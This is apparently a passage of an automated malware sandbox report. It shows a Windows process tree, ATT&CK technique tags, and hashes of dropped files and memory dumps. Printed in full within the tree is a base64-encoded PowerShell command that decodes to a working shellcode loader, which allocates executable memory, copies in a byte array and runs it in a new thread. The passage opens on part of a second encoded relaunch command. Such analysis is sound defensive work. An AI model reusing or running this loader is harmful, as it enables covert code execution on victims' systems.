0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHIAMAB4AFYAIAAkAHMAdgBQAGwAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcwB2AFAAbAAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABYAEoARABNACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWABKAEQATQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAZQA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiAGYALAAwAHgAZgA3ACwAMAB4ADQAZAAsADAAeAA5AGYALAAwAHgANgBlACwAMAB4ADUAYQAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAMwAxACwAMAB4ADcAYQAsADAAeAAxAGEALAAwAHgAOAAzACwAMAB4AGUAYQAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADcAYQAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4ADAAMgAsADAAeABiADEALAAwAHgANwA3ACwAMAB4AGUAYwAsADAAeABlAGMALAAwAHgANABhACwAMAB4ADgAOAAsADAAeAA5ADEALAAwAHgANgA1ACwAMAB4AGEAZgAsADAAeABiADkALAAwAHgAOQAxACwAMAB4ADEAMQAsADAAeABiAGIALAAwAHgAZQBhACwAMAB4ADIAMQAsADAAeAA1ADIALAAwAHgAZQA5ACwAMAB4ADAANgAsADAAeABjADkALAAwAHgAMwA2ACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAYgBmACwAMAB4ADkAZQAsADAAeAAyAGQALAAwAHgAMQA1ACwAMAB4ADcANQAsADAAeABmADgALAAwAHgAMAAwACwAMAB4AGEANgAsADAAeAAyADYALAAwAHgAMwA4ACwAMAB4ADAAMgAsADAAeAAyADQALAAwAHgAMwA1ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQA1ACwAMAB4AGYANgAsADAAeAA2ADEALAAwAHgAZQA1ACwAMAB4ADUAMgAsADAAeABlAGIALAAwAHgAOABiACwAMAB4AGIANwAsADAAeAAwAGIALAAwAHgANgA3ACwAMAB4ADMAOQAsADAAeAAyADgALAAwAHgAMwBmACwAMAB4ADMAZAAsADAAeAA4ADEALAAwAHgAYwAzACwAMAB4ADcAMwAsADAAeABkADMALAAwAHgAOAAxACwAMAB4ADMAMAAsADAAeABjADMALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeABlADYALAAwAHgANQBmACwAMAB4ADgAZAAsADAAeAA2ADIALAAwAHgAMAA4ACwAMAB4AGIAMwAsADAAeABhADUALAAwAHgAMgBiACwAMAB4ADEAMgAsADAAeABkADAALAAwAHgAOAAwACwAMAB4AGUAMgAsADAAeABhADkALAAwAHgAMgAyACwAMAB4ADcAZQAsADAAeABmADUALAAwAHgANwBiACwAMAB4ADcAYgAsADAAeAA3AGYALAAwAHgANQA5ACwAMAB4ADQAMgAsADAAeABiADMALAAwAHgANwAyACwAMAB4AGEAMAAsADAAeAA4ADIALAAwAHgANwA0ACwAMAB4ADYAZAAsADAAeABkADcALAAwAHgAZgBhACwAMAB4ADgANgAsADAAeAAxADAALAAwAHgAZQBmACwAMAB4ADMAOAAsADAAeABmADQALAAwAHgAYwBlACwAMAB4ADcAYQAsADAAeABkAGIALAAwAHgANQBlACwAMAB4ADgANAAsADAAeABkAGMALAAwAHgAMAA3ACwAMAB4ADUAZQAsADAAeAA0ADkALAAwAHgAYgBhACwAMAB4AGMAYwAsADAAeAA2AGMALAAwAHgAMgA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgANwAwACwAMAB4AGIAOQAsADAAeAAxAGUALAAwAHgAYQAwACwAMAB4ADgAZAAsADAAeAAzADIALAAwAHgAYQAxACwAMAB4ADYANwAsADAAeAAwADQALAAwAHgAMAAwACwAMAB4ADgANQAsADAAeABhADMALAAwAHgANABjACwAMAB4AGQAMgAsADAAeABhADQALAAwAHgAZgAyACwAMAB4ADIAOAAsADAAeABiADUALAAwAHgAZAA5ACwAMAB4AGUANQAsADAAeAA5ADIALAAwAHgANgBhACwAMAB4ADcAZgAsADAAeAA2AGQALAAwAHgAMwBlACwAMAB4ADcAZQAsADAAeABmADIALAAwAHgAMgBjACwAMAB4ADUANwAsADAAeABiADMALAAwAHgAMwBlACwAMAB4AGMAZgAsADAAeABhADcALAAwAHgAZABiACwAMAB4ADQAOQAsADAAeABiAGMALAAwAHgAOQA1ACwAMAB4ADQANAAsADAAeABlADEALAAwAHgAMgBhACwAMAB4ADkANgAsADAAeAAwAGQALAAwAHgAMgBmACwAMAB4AGEAYwAsADAAeABhAGYALAAwAHgAMQBhACwAMAB4AGQAMAAsADAAeAA2ADIALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeAAyAGYALAAwAHgAOAAzACwAMAB4ADYAOAAsADAAeAA0ADIALAAwAHgAZQBiACwAMAB4AGQANwAsADAAeAAzADgALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAA1ADcALAAwAHgAZAAzACwAMAB4AGYAYwAsADAAeABlADMALAAwAHgAOABkACwAMAB4ADQAZQAsADAAeABmADcALAAwAHgANwAzACwAMAB4AGUAZQAsADAAeAAyADcALAAwAHgAMAA2ACwAMAB4AGEANwAsADAAeAA4ADYALAAwAHgAMwA1ACwAMAB4ADAAOQAsADAAeABiADAALAAwAHgAZgBhACwAMAB4AGIAMwAsADAAeABlAGYALAAwAHgAZQBlACwAMAB4ADUAMgAsADAAeAA5ADQALAAwAHgAYgBmACwAMAB4ADQAZQAsADAAeAAwADMALAAwAHgANQA0ACwAMAB4ADEAMAAsADAAeAAyADYALAAwAHgANAA5ACwAMAB4ADUAYgAsADAAeAA0AGYALAAwAHgANQA2ACwAMAB4ADcAMgAsADAAeABiADEALAAwAHgAZgA4ACwAMAB4AGYAYwAsADAAeAA5AGQALAAwAHgANgBjACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAMAA3ACwAMAB4ADMANQAsADAAeAAyAGEALAAwAHgAMAA5ACwAMAB4AGMAOAAsADAAeABlADMALAAwAHgANQA2ACwAMAB4ADAAOQAsADAAeAA0ADIALAAwAHgAMAAwACwAMAB4AGEANgAsADAAeABjADcALAAwAHgAYQAzACwAMAB4ADYAZAAsADAAeABiADQALAAwAHgAYgBmACwAMAB4ADQAMwAsADAAeAAzADgALAAwAHgAZQA2ACwAMAB4ADYAOQAsADAAeAA1AGIALAAwAHgAOQA2ACwAMAB4ADgAZAAsADAAeAA5ADUALAAwAHgAYwA5ACwAMAB4ADEAZAAsADAAeAAwADQALAAwAHgAYwAyACwAMAB4ADYANQAsADAAeAAxAGMALAAwAHgANwAxACwAMAB4ADIANAAsADAAeAAyAGEALAAwAHgAZABmACwAMAB4ADUANAAsADAAeAAzAGYALAAwAHgAZQAzACwAMAB4ADcANQAsADAAeAAxADcALAAwAHgANQA3ACwAMAB4ADAAYwAsADAAeAA5AGEALAAwAHgAOQA3ACwAMAB4AGEANwAsADAAeAA1AGEALAAwAHgAZgAwACwAMAB4ADkANwAsADAAeABjAGYALAAwAHgAMwBhACwAMAB4AGEAMAAsADAAeABjAGIALAAwAHgAZQBhACwAMAB4ADQANAAsADAAeAA3AGQALAAwAHgANwA4ACwAMAB4AGEANwAsADAAeABkADAALAAwAHgANwBlACwAMAB4ADIAOQAsADAAeAAxADQALAAwAHgANwAyACwAMAB4ADEANwAsADAAeABkADcALAAwAHgANAAzACwAMAB4AGIANAAsADAAeABiADgALAAwAHgAMgA4ACwAMAB4AGEANgAsADAAeAA0ADQALAAwAHgAOAA0ACwAMAB4AGYAZQAsADAAeAA4AGUALAAwAHgAMwAyACwAMAB4AGUANAAsADAAeABjADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFoAcABZAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABaAHAAWQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWgBwAFkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2228
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5qbnsgbr.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:856
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDC9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEDC8.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5qbnsgbr.dll

Filesize
3KB

MD5
70dd7100a0de65bc90d8270b9c759ad6

SHA1
5bcf822e95dddd21ff3f2de3c6fc26afc906a23c

SHA256
bc193bc8148cf802652b7792cab2a47ec7d2423184802ee995b7089aaa3124d8

SHA512
ad172ac03a72408f54fb213868972594475b40fc4946957aced9f9cf53bb6ab790ab3872d50eb9e26eec49b14ac4dbfee20fbb12c32278715108e61556c5c67a

Download Submit
C:\Users\Admin\AppData\Local\Temp\5qbnsgbr.pdb

Filesize
7KB

MD5
0bedf4865bcf29193854aff0ea18af2f

SHA1
b5c9e85c895403cf7fa9510017965a7089b08c61

SHA256
11c80d91750f74091bc04e5877b4cd9f5deb6ce5bfc66332a1ba6c37ce7fed5b

SHA512
3950d67de709830dbe84ae5b96f3eb55aff0e85288451079ea71cb1afa85de484234700d68b8a3ba19a80c60a50fd6e3d55152aba223dce381d2545d4129deef

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEDC9.tmp

Filesize
1KB

MD5
8260eebd83f85113a491f198550130bd

SHA1
e8c03dd9f15951e473d6b68ba86d18a1eae8d300

SHA256
fef63c8d1e9df812eab80f3375aa1ef952458a466aebf7dce88204c5c1b58c19

SHA512
6cfab6a0f39ef7fae2718a7126e034b8f8d5dd13c09f6b9074c6519a03e4dd863a414718885d17a3f666ddcc687d375db6b2b69773a299c0924a42d2a5cfe99a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c7a5bfea9782f1791105066e322325a4

SHA1
71a90ac65a8eef4a6dfb3d706cf3e8168de8b65b

SHA256
3ce984aee1e3cd20b2c1ba6175ffb431b5d706467085c747d382a42b00707f85

SHA512
b2b5903a0c4d84fcf0b3a5afa5f4f56eddcd1affea6003f112dfb5c1f62ffa3234e2ed8ed06dc0d3b0bfe4c457ee31d69747ba593fba6ea3486aedd36961599a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5qbnsgbr.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5qbnsgbr.cmdline

Filesize
309B

MD5
79d0c5f02a4ee3aa953be374765c77b2

SHA1
6b9da8f6d173a461fe7ed2be19ade0524c59aa9d

SHA256
45e7feabce63a44fbb33e92675f738cebe9af6d2b178912135c544b882327482

SHA512
920d67f642b26a65d4cc1e6ede5d758f394af3c2184b4507cab122f9bd9e368af238fbdf69d7f4e445c24ba2231dd67cd2e91dbdbc4b0e7d81fe8e8ebde72ebb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCEDC8.tmp

Filesize
652B

MD5
3f5039c695f1bde4ca8ffa510c7667fb

SHA1
34f07729283ac42d1c77121e6f309d70cdff6a4a

SHA256
4034bccee45707755de0e19dbf3a09f8ba3e9b900f5cabd03ca053c8399b7e79

SHA512
b3f1a9d89c73c40644ff4e83c8697ab2ac72ecc261e207f1c5666f8019d5a260de4cf3b617881cc77335235208f17f34a5a9fdcca0148e2decd1638054b6df73

Download Submit
memory/576-0-0x0000000000400000-0x0000000000476000-memory.dmp

Filesize
472KB

Download
memory/2228-33-0x0000000002D00000-0x0000000002D01000-memory.dmp

Filesize
4KB

Download
memory/2468-6-0x0000000074500000-0x0000000074AAB000-memory.dmp

Filesize
5.7MB

Download
memory/2468-7-0x0000000074500000-0x0000000074AAB000-memory.dmp

Filesize
5.7MB

Download
memory/2468-5-0x0000000074500000-0x0000000074AAB000-memory.dmp

Filesize
5.7MB

Download
memory/2468-4-0x0000000074500000-0x0000000074AAB000-memory.dmp

Filesize
5.7MB

Download
memory/2468-3-0x0000000074501000-0x0000000074502000-memory.dmp

Filesize
4KB

Download
memory/2468-34-0x0000000074500000-0x0000000074AAB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads